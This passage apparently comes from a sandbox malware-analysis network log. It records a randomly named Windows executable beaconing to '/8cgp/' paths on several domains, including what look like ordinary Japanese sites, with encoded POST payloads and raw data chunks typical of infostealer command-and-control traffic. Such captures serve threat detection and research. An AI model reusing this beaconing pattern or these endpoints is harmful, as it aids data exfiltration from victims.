

                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    14 | 192.168.11.20 | 50259 | 118.27.122.214 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:23.484878063 CEST | 1008 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=Ff+IoCJIoBgLqHOQKPheBkNiKrUprlNNM2r+vRwgW51RgaEPOgQMvw2qUSljECLwvfjuAzF3QkBOv2NcS4P3Kl+v7im+ZcSzGkKY2pYa9zgqQ0Rz+j4Rg/g8s1hqNYvlfduzoOacl1++0xD+q5YQTUyJ9U1LlGZ5EhdWQLhfKA1L+scy3cmDuiRqhpjHizI5KLkGSYKchhTDMXhrbuH4PfhrDKRfrX8sUfgCfULihQYzXmhuyDoCVSlvOxIXjiLqVYbrB5uUTuH+1pi27YWjOGd1kSF4n7sMIT3alfiHwa3KGkzokhWkU4x2hxaTaMYqin90sNe9Y07aCWHLTVFTwcrUpCn56HXn6QK2ygGQjTHu3CiO1TnqyQOYhNZ+LgZkU4J/8Vc27ElxA5Nt4pAiSBGfdqJs8ffQjl4cXg+e3SLPYW9RWWscNt+u2DTGiX3sxNrfXB/AEcW7hTIf7Fa0PQdS9cmmxRcrW5sE6ugk57q7IUacIXZTuL0mh/kPvCQE7NSDisdaFJEaIm/BqT00Q2w=
                                                                    Apr 24, 2024 12:29:23.758527994 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:23 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    15 | 192.168.11.20 | 50260 | 118.27.122.214 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:26.291604996 CEST | 1289 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:27.110719919 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:26 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    16 | 192.168.11.20 | 50261 | 118.27.122.214 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:29.102055073 CEST | 392 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kansaiwoody.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:29.384545088 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:29 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 196
                                                                    Connection: close
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    17 | 192.168.11.20 | 50262 | 157.7.107.63 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:35.158042908 CEST | 680 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=1EGodtIZG4lCExT1V+445OC1KdB80aC1WYX3cKLY5cEqJslP2IWjTSeY6XdKcLF1ZnCztb3b/Zc1RDAiCS78vx7TBmLvdrZsDqhc0b48z8X09JnNPg3bE3zemBNkL6+bL/WVbev1lIPx6SSvzwlfJ4SXxU2CJKfgXrlAu6EDaucGUlkkvYKsX8xpoBj/CJy7jg==
                                                                    Apr 24, 2024 12:29:35.641222000 CEST  1289               IN         HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text


                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                    18          192.168.11.20  50263        157.7.107.63    80                7240  C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp                             Bytes transferred  Direction  Data
                                                                    Apr 24, 2024 12:29:37.959556103 CEST  1020               OUT        POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=1EGodtIZG4lCCiL1UZk4u+C6HNB866C5WYL3cInx5K8qJONP3KyjQSeY13dTf7FyZnG7tePb/ZY1Rw4iAi7/hR7SJGLuLbZ6Drdq0ac80PT0vaPNL1DYDXzYvhNnCa+vL/arbc+Xk6Tx7zyvhAlQcYSMuE3sBoGSWptCnNgHAMcpYFBptIODGO57xFehGdn2x6JSWC9PpqwdOBnog3TqRYf9g8RJYZ5GeeRUVMUZQV4aKd3YAsbZU3CU5YxShQ/vx8Td55orU0LfbH+46Ql1fo/YNotmKCHK0rF80RHa0xTNipv9oS1L/YIgNXxnkMhi7owpL6WHyewSVLoOVbvkAw+xQBlJyLJHuSn0gh3oEpk807NNc1osHTi9SQMEZjb+5Yl4G9ik1wvZYzOBG3zs33/CYe0EYBDXrwjbfGJtPVOJmujRY3SMmw+sSowGhxj22s29nLyJgRHq3UKtEJCrg0tJiFVmu4/eXs8RH8OBcGUnb8E1QNzB415B9oNvNRwxDv0RDpN6rh2TB1vcnQ97CBs=
                                                                    Apr 24, 2024 12:29:38.446609020 CEST  1289               IN         HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Ascii: fa1<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text


                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                    19          192.168.11.20  50264        157.7.107.63    80                7240  C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp                             Bytes transferred  Direction  Data
                                                                    Apr 24, 2024 12:29:40.772304058 CEST  2578               OUT        POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:41.832473040 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    20 | 192.168.11.20 | 50265 | 157.7.107.63 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:43.581357002 CEST | 396 | OUT | GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.a-two-spa-salon.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:44.049843073 CEST | 507 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 24 Apr 2024 10:29:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://a-two-spa-salon.com/8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8
                                                                    X-Cache: MISS


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    21 | 192.168.11.20 | 50266 | 203.161.49.193 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:57.648444891 CEST | 659 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=w+f7fcPcqc3KaGgiiC2cejCz3HsNuELpdkgwC2pIqW5n3VhtgmBvBY5el2X8VIS6o68Hj/EWvH9KUl2VmTRfUZ6MwdAPOTl+BwNHOFQVeqHstONDdUWQuJzu7KSmiFpOZIvla91UokbbKMR4QeToC7f/1G/5fvwQVAtolDliOoDWx1p1upbbW9qW2O9QIu/cDg==
                                                                    Apr 24, 2024 12:29:58.030041933 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:57 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    22 | 192.168.11.20 | 50267 | 203.161.49.193 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:00.350575924 CEST | 999 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:00.537965059 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:00 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    23 | 192.168.11.20 | 50268 | 203.161.49.193 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:03.054003000 CEST | 3867 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:03.231410027 CEST5156OUTData Raw: 54 33 71 39 79 44 59 71 4c 7a 36 6a 4a 76 54 6f 69 74 48 5a 66 44 51 42 4c 6a 62 6d 4e 64 5a 4e 4c 33 2f 7a 4f 50 31 4b 71 53 7a 63 58 68 41 74 62 4a 79 58 32 6e 6a 36 4d 46 44 65 43 51 5a 42 71 4b 47 45 31 68 79 4a 42 58 31 42 61 52 59 64 68 6a
                                                                    Data Ascii: T3q9yDYqLz6jJvToitHZfDQBLjbmNdZNL3/zOP1KqSzcXhAtbJyX2nj6MFDeCQZBqKGE1hyJBX1BaRYdhjiAVJ87e2S0beX3RPFLn5iIAYt/rGHUwNOeg6nedSAEJe7xNBVc1xFm5lzSuRmsODYsYTeNchhrD8zIvXJEuqOZy+kp8SdahCDpih4BEXZUNoC3qLmIujnmmr1/eVC8ljvcCerhVH0KfvIXdAQAZCM3lhWLaYgVcXN
                                                                    Apr 24, 2024 12:30:03.231679916 CEST15468OUTData Raw: 45 79 48 69 45 72 77 50 48 76 78 4f 36 65 41 4b 61 42 61 38 51 45 44 48 48 30 71 6b 74 57 50 49 79 30 6e 42 79 44 66 4c 6a 76 51 43 42 6d 53 38 4c 61 4a 76 55 77 6b 52 55 4d 36 6e 59 4d 39 2b 4c 2b 57 56 64 79 32 79 79 61 5a 38 6d 65 69 42 43 52
                                                                    Data Ascii: EyHiErwPHvxO6eAKaBa8QEDHH0qktWPIy0nByDfLjvQCBmS8LaJvUwkRUM6nYM9+L+WVdy2yyaZ8meiBCRDcfFiPW3RfHvOy8UvyRMAMs1DjGcZzdNBUz/Oy5ujGHygg1dKwAgX/pFelnuDbZ0X85NYHiSuIC8X6zb2QiMHuqv0JI6Jpe1re8E6LuUHZEs/2hVvONEA29fZ2g1Ao1O23wIu/EG0deSjRc+r2WUk7bBMBrkZJvzU
                                                                    Apr 24, 2024 12:30:03.232146025 CEST1289OUTData Raw: 37 33 6f 45 63 77 39 6e 6c 71 4d 73 7a 4a 4c 68 49 39 45 6a 67 5a 77 6e 59 67 66 57 73 4d 30 6d 6b 48 39 6b 32 36 56 36 52 37 64 47 2f 6c 41 32 33 5a 4c 76 42 76 55 72 72 48 73 2f 32 52 51 7a 2b 4e 61 57 33 75 4a 50 72 79 48 6d 76 38 47 55 69 56
                                                                    Data Ascii: 73oEcw9nlqMszJLhI9EjgZwnYgfWsM0mkH9k26V6R7dG/lA23ZLvBvUrrHs/2RQz+NaW3uJPryHmv8GUiVneBy8hUTyRE6AcQuH44Wk5zYckTjQTr9TvCss0Ti6nnepxIyMCRIhYIYVIvFgDLpObtPU/whZ+qdqmP+CRpCsSiJo8y6brfGFvz0zNaTUUpeDUMRprL29pCNMxNGUEGvTrw8xQCuXV0NKhlXTHJjSB2TqUJqV3QDS
                                                                    Apr 24, 2024 12:30:03.232198954 CEST3867OUTData Raw: 47 41 57 54 65 74 47 65 35 46 79 41 53 58 31 43 69 31 72 30 53 52 53 61 4f 31 58 76 4a 62 32 6b 69 53 57 64 72 65 47 61 61 74 71 6b 41 7a 75 66 79 64 61 6f 76 4d 32 34 38 69 5a 6f 4c 4f 74 66 5a 33 75 48 41 49 6e 6a 59 57 52 50 54 37 79 70 6b 2b
                                                                    Data Ascii: GAWTetGe5FyASX1Ci1r0SRSaO1XvJb2kiSWdreGaatqkAzufydaovM248iZoLOtfZ3uHAInjYWRPT7ypk+UTRnTLwH9sDVD+0/9uiqlmpLdApdwem8OC+tmwlmmlqoIU81fu4oTbg2FvhReI38o0qP10DZHsJ8IvYM7KfSal6/UqH6aWO3chQk7NeiQ8ayJak8ILlJw+L3jnYA9Pm6zO6VpIZIr9yzVUaPLJIFxbCHkSuBZxApX
                                                                    Apr 24, 2024 12:30:03.408809900 CEST5156OUTData Raw: 51 58 63 59 78 62 74 46 48 39 31 66 52 44 67 75 4a 71 68 39 52 56 71 4f 41 4a 48 76 36 66 47 59 38 4f 77 33 47 32 33 47 68 79 55 6d 52 30 6c 53 68 64 76 6f 61 4b 6b 54 46 4c 2f 71 6d 67 2f 45 63 77 45 73 55 36 70 57 71 78 2f 65 6a 36 44 6c 36 6f
                                                                    Data Ascii: QXcYxbtFH91fRDguJqh9RVqOAJHv6fGY8Ow3G23GhyUmR0lShdvoaKkTFL/qmg/EcwEsU6pWqx/ej6Dl6o841WvS+hNp26obX1TnGI/gZe3CsM/iQPiGSFLwNIVbEG+MMTBVQJ0BBQUSMMKSouleU8kOTXdgtc+OYHi8OwndtmzjGsKgXbo9BsDNVqZL9vzEA9fDSurKmNgq+nJyl0GkGpCCFrifcNs6hb5Bl1hnCRAcHEERWep
                                                                    Apr 24, 2024 12:30:03.409076929 CEST2578OUTData Raw: 62 42 49 51 30 54 69 70 76 47 4d 4e 4f 32 38 61 46 74 34 6f 31 55 35 6d 79 63 55 42 51 6a 64 37 2f 72 30 77 76 58 68 6f 50 6e 56 75 6b 7a 73 6f 43 77 72 57 4b 48 7a 75 31 66 75 75 67 39 65 67 4d 66 34 31 31 71 76 6d 30 43 43 71 31 4c 34 37 74 43
                                                                    Data Ascii: bBIQ0TipvGMNO28aFt4o1U5mycUBQjd7/r0wvXhoPnVukzsoCwrWKHzu1fuug9egMf411qvm0CCq1L47tCBODIHyg0uPVHpX+Mk1ztffBUGM643kmASfWX129WeFPNQ5j7XY4jEF+cn73tFV1hZ6M/pfBEj5OuK+4EVCIQGwJ7/q4fwga0dD9bCRi7q2dsusn6cVOkkOGD37isihMr3KdvFhbubWnz9rJAP1iJz6ndgk6DDTPhZ
                                                                    Apr 24, 2024 12:30:03.409348011 CEST6992OUTData Raw: 53 6f 4e 6f 47 55 45 72 7a 53 46 73 44 63 44 5a 63 6a 35 52 64 56 78 47 51 4e 63 6b 41 2f 43 57 75 36 5a 6d 2f 6f 43 52 34 2f 43 34 58 66 48 38 49 48 43 31 54 58 74 59 41 63 51 73 4d 54 6a 53 43 6e 54 35 48 55 69 64 76 42 65 2f 6e 74 4e 68 58 43
                                                                    Data Ascii: SoNoGUErzSFsDcDZcj5RdVxGQNckA/CWu6Zm/oCR4/C4XfH8IHC1TXtYAcQsMTjSCnT5HUidvBe/ntNhXCPGcwdNaF3PASjT+vo7hUNra6s1PyTyUxF2SMoSQr19RdXkSOCTgQ+WHwo4DTmqNM5hAbsSbIv88gEA3kFQbEqaakKeL5A4BOn59iL0VA1wf3hMxq1TrnFmmwics0MlFm8Nkb4WhKsqldK5Te4JYTzFlWdM1oOGUlh
                                                                    Apr 24, 2024 12:30:04.704473019 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:03 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    24 | 192.168.11.20 | 50269 | 203.161.49.193 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:05.756561041 CEST | 389 | OUT | GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.techfun.info
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:06.017165899 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:05 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    25 | 192.168.11.20 | 50270 | 67.225.140.26 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:11.664141893 CEST | 686 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
